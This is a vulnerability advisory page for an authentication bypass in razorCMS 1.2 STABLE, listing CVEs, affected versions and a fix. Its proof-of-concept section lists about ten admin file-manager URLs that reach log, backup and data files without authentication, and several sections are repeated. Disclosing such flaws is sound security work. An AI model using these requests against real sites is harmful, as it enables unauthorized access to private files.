razorCMS File and Directory Authentication Bypass Vulnerability
BID:51344
Info
razorCMS File and Directory Authentication Bypass Vulnerability
| Bugtraq ID: | 51344 |
| Class: | Access Validation Error |
| CVE: |
CVE-2012-5918 CVE-2012-6038 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2012 12:00AM |
| Updated: | Mar 13 2013 05:25PM |
| Credit: | chap0 |
| Vulnerable: |
Morgan Integrated Systems razorCMS 1.2 STABLE |
| Not Vulnerable: |
Morgan Integrated Systems razorCMS 1.2.1 STABLE |
Discussion
razorCMS File and Directory Authentication Bypass Vulnerability
razorCMS is prone to an authentication-bypass vulnerability.
An attacker can gain unauthorized access to files and directories. Successful exploits may lead to other attacks.
razorCMS 1.2 STABLE is vulnerable; other versions may also be affected.
razorCMS is prone to an authentication-bypass vulnerability.
An attacker can gain unauthorized access to files and directories. Successful exploits may lead to other attacks.
razorCMS 1.2 STABLE is vulnerable; other versions may also be affected.
Exploit / POC
razorCMS File and Directory Authentication Bypass Vulnerability
An attacker can exploit this issue through a browser.
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/
http://www.example.com/admin/?action=filemanview&dir=backup/
http://www.example.com/admin/?action=filemanview&dir=/razor_data.txt
http://www.example.com/admin/?action=filemanview&dir=/index.htm
http://www.example.com/admin/?action=fileman&dir=razor_temp_logs/
http://www.example.com/admin/?action=fileman&dir=backup/
http://www.example.com/admin/?action=fileman&dir=/razor_data.txt
http://www.example.com/admin/?action=fileman&dir=/index.htm
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/sekrit/
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt
An attacker can exploit this issue through a browser.
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/
http://www.example.com/admin/?action=filemanview&dir=backup/
http://www.example.com/admin/?action=filemanview&dir=/razor_data.txt
http://www.example.com/admin/?action=filemanview&dir=/index.htm
http://www.example.com/admin/?action=fileman&dir=razor_temp_logs/
http://www.example.com/admin/?action=fileman&dir=backup/
http://www.example.com/admin/?action=fileman&dir=/razor_data.txt
http://www.example.com/admin/?action=fileman&dir=/index.htm
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/sekrit/
http://www.example.com/admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt
Solution / Fix
razorCMS File and Directory Authentication Bypass Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
razorCMS File and Directory Authentication Bypass Vulnerability
References:
References:
- razorCMS Homepage (Morgan Integrated Systems)